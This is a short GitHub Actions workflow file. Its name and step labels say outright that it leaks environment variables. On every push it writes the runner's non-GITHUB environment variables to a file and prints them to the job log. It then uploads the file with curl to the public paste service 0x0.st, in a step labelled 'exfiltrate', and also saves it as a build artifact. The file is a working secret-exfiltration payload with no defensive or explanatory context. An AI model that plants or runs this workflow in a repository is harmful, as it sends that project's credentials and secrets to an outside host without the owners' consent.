name: Leak Env Vars Without GITHUB_TOKEN

on: [push]

jobs:
  leak:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Dump non-GITHUB env vars to file
        run: |
          env | grep -v '^GITHUB_' | grep -v '^ACTIONS_ID_TOKEN_' > leak.txt

      - name: Print to log for manual retrieval
        run: |
          echo "::group::LEAKED ENV VARS"
          cat leak.txt
          echo "::endgroup::"

      - name: Upload to 0x0.st (exfiltrate)
        run: |
          curl -F 'file=@leak.txt' https://0x0.st > url.txt
          echo "Exfiltrated to:"
          cat url.txt

      - name: Artifact upload (if possible)
        uses: actions/upload-artifact@v3
        with:
          name: leaked-env-vars
          path: leak.txt
